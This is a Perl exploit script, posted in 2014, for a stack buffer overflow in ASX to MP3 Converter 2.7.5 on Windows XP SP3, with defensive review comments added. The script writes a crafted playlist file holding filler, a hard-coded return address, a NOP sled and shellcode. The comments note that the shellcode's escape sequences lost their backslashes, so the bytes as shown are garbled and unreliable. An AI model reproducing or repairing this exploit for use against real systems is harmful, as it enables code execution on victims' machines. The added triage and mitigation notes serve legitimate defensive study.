Asx To MP3 2.7.5 Stack Buffer Overflow
Posted on 08 October 2014
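#!/usr/bin/perl
###########################################################################################
# Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow
# Date: 6 Oct 2014
# Exploit Author: Amir Reza Tavakolian
# Vendor Homepage: http://binarylife.blog.ir/
# Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html
# Version: 2.7.5
# Tested on: windows xp sp 3
#
#
# Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com.
# Thanks Mike. :)
##########################################################################################
#
# Review notes (defensive context)
#
# Purpose: builds a single oversized playlist file (poc1.m3u) whose layout is
#   filler | 4-byte value | short pad | payload | filler
# The title describes a stack buffer overflow, so the application presumably
# copies playlist content into a fixed-size stack buffer without a length
# check -- confirm against the vendor's code or a debugger trace.
#
# NOTE(review): the quoted byte strings below are reproduced exactly as they
# appear on the page, where the escape sequences appear to have lost their
# leading backslash in extraction. Perl treats them as plain text, so the
# lengths and bytes this listing produces will not match the author's
# original. Treat the listing as documentation of the file structure, not as
# a byte-accurate sample.
#
# Triage and mitigation pointers:
#   * A playlist of tens of kilobytes with no line breaks and long runs of one
#     repeated character is a reasonable detection heuristic for this class
#     of file.
#   * The 4-byte value is a hard-coded address. It is only meaningful where
#     that address is stable across runs (the page lists Windows XP SP3);
#     ASLR and DEP on later Windows versions are the relevant platform
#     mitigations.
#   * The durable fix is in the parser: bound the copy to the destination
#     size and reject over-long playlist entries. Until then, do not open
#     untrusted playlists with the affected version.
#
use strict;
use warnings;

# Leading filler that pads the file up to the overwritten 4-byte slot.
my $junk = "x41" x 35056;

# 32-bit little-endian value ('V'); named for the saved instruction pointer
# it is meant to replace.
my $eip = pack('V', 0x73e848a7);

# Short pad placed between the overwritten value and the payload.
my $nop = "x90" x 4;

# Payload: a pad prefix followed by the author's byte string.
# NOTE(review): the embedded ASCII fragments (46 61 74 61 = "Fata",
# 45 78 69 74 = "Exit", and the pushed pieces " Bro" / "kenB" / "yte")
# suggest a demonstration payload that shows a message and exits rather than
# anything persistent -- confirm by disassembly in an isolated analysis
# environment before relying on this.
my $shellcode = "x90" x 25;
$shellcode = $shellcode
    . "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"
    . "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"
    . "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"
    . "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"
    . "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"
    . "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"
    . "x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"
    . "x49x0bx31xc0x51x50xffxd7";

# Trailing filler appended after the payload.
my $junk1 = "c" x 24806;

my $total = $junk . $eip . $nop . $shellcode . $junk1;

my $file = "poc1.m3u";

# Three-argument open with a lexical handle: the mode can no longer be
# influenced by the file name, and every I/O step is checked instead of
# failing silently as in the original two-argument, bareword-handle form.
open(my $out_fh, '>', $file) or die "Cannot open $file for writing: $!";
print {$out_fh} $total or die "Cannot write to $file: $!";
close($out_fh) or die "Cannot close $file: $!";

print "Done.../";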
